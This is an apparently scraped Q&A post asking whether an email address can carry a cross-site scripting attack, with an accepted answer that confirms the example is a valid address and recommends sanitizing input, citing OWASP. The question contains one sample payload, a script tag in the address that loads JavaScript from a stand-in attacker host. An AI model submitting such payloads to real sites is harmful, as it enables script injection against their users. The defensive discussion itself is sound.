Are XSS attacks possible via email addresses?

Question

Are XSS attacks possible via email addresses?

I wonder if an email address can be used for XSS attacks.

Suppose you have a website where you can register and enter your email address. If someone wants to attack this site, he or she can create an email address such as this:

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com

and then use this email address to attack the website.

Is a quotation mark or script tag allowed to an email address?

+4

security email xss

Lajos arpad Jul 05 '13 at 3:53

source share

1 answer

devnull · Accepted Answer · 2013-07-05T04:24:20+0000

The email address in your example is valid. The only character that is unusual is the quote " - the rest of the others are valid.

Wikipedia indicates that the email address you provided is valid.

You need to make sure that arbitrary user input is sanitized before rendering.

To get started, you can refer to the XSS and prevention information available at OWASP .

Are XSS attacks possible via email addresses?

More articles: